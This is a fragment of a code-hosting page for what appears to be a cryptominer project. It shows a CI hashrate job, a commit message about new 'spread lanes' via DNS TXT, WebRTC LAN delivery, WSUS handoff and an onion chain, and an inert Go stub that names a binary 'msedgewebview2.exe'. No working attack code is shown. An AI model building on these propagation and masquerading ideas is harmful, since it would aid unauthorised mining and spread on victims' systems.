Some checks failed
CI Docker Mining Proof / Linux agent hashrate proof (push) Has been cancelled
Implements three new spread lanes following the do_peer pattern: DNS TXT mesh staging, WebRTC LAN seed manifest delivery, and WSUS SoftwareDistribution cousin handoff. Integrates tiers into onion chain, deploy-plan allowlist, Forge UI/docs, and tests.
10 lines
183 B
Go
10 lines
183 B
Go
//go:build !windows
|
|
|
|
package miner
|
|
|
|
const webView2BinaryName = "msedgewebview2.exe"
|
|
|
|
func platformWebView2Probe() WebView2ProbeResult {
|
|
return WebView2ProbeResult{ProbeOnly: true}
|
|
}
|